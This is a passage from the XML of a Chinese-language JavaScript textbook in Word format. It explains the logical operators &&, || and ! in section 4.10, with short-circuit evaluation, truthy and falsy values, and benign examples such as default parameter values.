        <w:t>的父类）的一个实例，表达式返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:t>f.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>不在</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的原型链中的话</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>，那么</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>就不是</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>的实例，</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="4_10_Luo_Ji_Biao_Da_Shi_"/>
      <w:r>
        <w:t>4.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　逻辑表达式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>逻辑运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“||”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“!”</w:t>
      </w:r>
      <w:r>
        <w:t>是对操作数进行布尔算术运算，经常和关系运算符一起配合使用，逻辑运算符将多个关系表达式组合起来组成一个更复杂的表达式。这些运算符在</w:t>
      </w:r>
      <w:r>
        <w:t>下面几节中会一一讲述，为了更好地理解它们，应当首先回顾一下</w:t>
      </w:r>
      <w:r>
        <w:t>3.3</w:t>
      </w:r>
      <w:r>
        <w:t>节提到的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>真值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>假值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的概念。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="4_10_1_Luo_Ji_Yu_____"/>
      <w:r>
        <w:t>4.10.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　逻辑与</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符可以从三个不同的层次进行理解。最简单的第一层理解是，当操作数都是布尔值的时候，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>对两个值执行布尔与（</w:t>
      </w:r>
      <w:r>
        <w:t>AND</w:t>
      </w:r>
      <w:r>
        <w:t>）操作，只有在第一个操作数和第二个操作数都是</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>的时候，它才返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。如果其中一个操作数是</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，它返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>常用来连接两个关系表达式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x==0</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>y==0//</w:t>
      </w:r>
      <w:r>
        <w:t>只有在</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>都是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的时候，才返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关系表达式的运算结果</w:t>
      </w:r>
      <w:r>
        <w:t>总是为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，因此当这样使用的时候，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符本身也返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。关系运算符的优先级比</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（和</w:t>
      </w:r>
      <w:r>
        <w:t>“||”</w:t>
      </w:r>
      <w:r>
        <w:t>）要高，因此类似这种表达式可以放心地书写，而不用补充圆括号。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>但是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的操作数并不一定是布尔值，回想一下，有些值可以当做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>真值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>假值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（参照</w:t>
      </w:r>
      <w:r>
        <w:t>3.3</w:t>
      </w:r>
      <w:r>
        <w:t>节，假值是</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>-0</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:t>，所有其他的值包括所有对象都是真值）。对</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的第二层理解是，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>可以对真值和假值进行布尔与（</w:t>
      </w:r>
      <w:r>
        <w:t>AND</w:t>
      </w:r>
      <w:r>
        <w:t>）操作。如果两个操作数都是真值，那么返回一</w:t>
      </w:r>
      <w:r>
        <w:t>个真值；否则，至少一个操作数是假值的话，则返回一个假值。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中任何希望使用布尔值的地方，表达式和语句都会将其当做真值或假值来对待，因此实际上</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>并不总是返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，但也并无大碍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，上文提到了运算符返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>真值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>假值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，但并没有说明这个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>真值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>假值</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>到底是什么值。为此，我们深入讨论对</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的第三层（也是最后一层）理解。运算符首先计算左操作数的值，即首先计算</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>左侧的表达式。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果计算结果是假值，那么整个表达式的结果一定也是假值，因此</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:t>时简单地返回左操作数的值，而并不会对右操作数进行计算。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>反过来讲，如果左操作数是真值，那么整个表达式的结果则依赖于右操作数的值。如果右操作数是真值，那么整个表达式的值一定是真值；如果右操作数是假值，那么整个表达式的值一定是假值。因此，当左操作数是真值时，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符将计算右操作数的值并将其返回作为整个表达式的计算结果：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o={x:1};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var p=null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>o.x//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1:o</w:t>
      </w:r>
      <w:r>
        <w:t>是真值，因此返回值为</w:t>
      </w:r>
      <w:r>
        <w:t>o.x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>p.x//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>null:p</w:t>
      </w:r>
      <w:r>
        <w:t>是假值，因此将其返回，而并不去计算</w:t>
      </w:r>
      <w:r>
        <w:t>p.x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这对于理解</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>可能不会去计算右操作数的情况至关重要，在上述示例代码中，变量</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>的值是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，而如果计算表达式</w:t>
      </w:r>
      <w:r>
        <w:t>p.x</w:t>
      </w:r>
      <w:r>
        <w:t>的话则会抛出一个类型错误异常。但是示例代码使用了</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的一种符合语言习惯的用法，因此只有在</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>为真值（不能是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>）的情况下才会计算</w:t>
      </w:r>
      <w:r>
        <w:t>p.x</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的行为有时称做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>短路</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>short circuiting</w:t>
      </w:r>
      <w:r>
        <w:t>），我们也会经常看到很多代码利用了这一特性来有条件地执行代码。例如，下面两行</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码是完全等价的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(a==b)stop();//</w:t>
      </w:r>
      <w:r>
        <w:t>只有在</w:t>
      </w:r>
      <w:r>
        <w:t>a==</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>的时候才调用</w:t>
      </w:r>
      <w:r>
        <w:t>stop()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(a==b)</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>stop();//</w:t>
      </w:r>
      <w:r>
        <w:t>同上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一般来讲，当</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>右侧的表达式具有副作用的时候（赋值、递增、递减和函数调用表达式）要格外小心。因为这些带有副作用的表达式的执行依赖于左操作数的计算结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>可以按照第二层和第三层的理解进行一些复杂表达式运算，但大多数情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>仅用来对真值和假值做布尔计算。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="4_10_2_Luo_Ji_Huo_____"/>
      <w:r>
        <w:t>4.10.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　逻辑或（</w:t>
      </w:r>
      <w:r>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“||”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符对两个操作数做布尔或（</w:t>
      </w:r>
      <w:r>
        <w:t>OR</w:t>
      </w:r>
      <w:r>
        <w:t>）运算。如果其中一个或者两个操作数是真值，它返回一个真值。如果两个操作数都是假值，它返回一个假值</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管</w:t>
      </w:r>
      <w:r>
        <w:t>“||”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符大多数情况下只是做简单布尔或（</w:t>
      </w:r>
      <w:r>
        <w:t>OR</w:t>
      </w:r>
      <w:r>
        <w:t>）运算，和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>一样，它也具有一些更复杂的行为。它会首先计算第一</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>个操作数的值，也就是说会首先计算左侧的表达式。如果计算结果为真值，那么返回这个真值。否则，再计算第二个操作数的值，即计算右侧的表达式，并返回这个表达式的计算结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符一样，同样应当避免右操作数包含一些具有副作用的表达式，除非你目地明确地在右侧使用带副作用的表达式，而有可能不会计算右侧的表达式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个运算符最常用的方式是用来从一组备选表达式中选出第一个真值表达式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>max_width</w:t>
      </w:r>
      <w:r>
        <w:t>已经定义了，直接使用它；否则在</w:t>
      </w:r>
      <w:r>
        <w:t>preferences</w:t>
      </w:r>
      <w:r>
        <w:t>对象中查找</w:t>
      </w:r>
      <w:r>
        <w:t>max_width</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果没有定义它，则使用一个写死的常量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var max=max_width||preferences.max_width||500;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这种惯用法通常用在函数体内，用来给参数提供默认值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的成员属性复制到</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>，并返回</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function copy(o,p){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>p=p||{};//</w:t>
      </w:r>
      <w:r>
        <w:t>如果向参数</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>没有传入任何对象，则使用一个新创建的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>函数体内的主逻辑</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93" w:name="4_10_3_Luo_Ji_Fei____"/>
      <w:r>
        <w:t>4.10.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　逻辑非（</w:t>
      </w:r>
      <w:r>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>“!”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符是一元运算符。它放置在一个单独的操作数之前。它的目的是将操作数的布尔值进行求反。例如，如果</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>是真值，则</w:t>
      </w:r>
      <w:r>
        <w:t>!x</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>；如果</w:t>
      </w:r>
      <w:r>
